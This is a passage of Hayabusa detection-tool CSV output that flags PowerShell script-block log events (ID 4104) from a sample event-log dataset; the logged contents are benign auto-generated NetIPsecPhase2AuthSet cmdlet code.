[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"uery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' -Alias '*' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"uery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' -Alias '*' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and 